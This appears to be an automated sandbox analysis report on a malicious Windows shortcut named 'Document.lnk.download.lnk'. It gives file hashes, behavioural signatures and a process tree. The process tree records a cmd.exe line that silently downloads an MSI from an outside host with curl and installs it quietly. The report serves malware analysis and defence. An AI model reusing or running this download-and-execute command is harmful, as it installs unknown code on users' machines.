Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
12-12-2024 11:08
Static task
static1
Behavioral task
behavioral1
Sample
Document.lnk.download.lnk
Resource
win7-20240903-en
windows7-x64
2 signatures
150 seconds
Behavioral task
behavioral2
Sample
Document.lnk.download.lnk
Resource
win10v2004-20241007-en
windows10-2004-x64
23 signatures
150 seconds
General
-
Target
Document.lnk.download.lnk
-
Size
2KB
-
MD5
d4f518a06f228fb45e26355095985eee
-
SHA1
1fcdd6f0a1e7513c607bbbe40ce50567225e81e8
-
SHA256
d9e9cf4e194792c8a81fa855733259a633e830d7753839c0b1be1314e3d478f3
-
SHA512
0e4d4d728b29463efe163a1654a8f67c6fe363505d3d41ddd7c2bb2210f36e5eb2bfb3017394a14407c69e0f04fc8913650d56ae4b460f60a366379f6d2596d9
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 1320 wrote to memory of 2228 1320 cmd.exe 32 PID 1320 wrote to memory of 2228 1320 cmd.exe 32 PID 1320 wrote to memory of 2228 1320 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\Document.lnk.download.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:1320 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k curl -sLo C:\Users\Admin\AppData\Local\Temp\a1bc08e6-90e6-4852-ab11-16ba60e33abb.msi https://servergate.org/rt/setup.msi & C:\Users\Admin\AppData\Local\Temp\a1bc08e6-90e6-4852-ab11-16ba60e33abb.msi /qn & exit2⤵PID:2228
-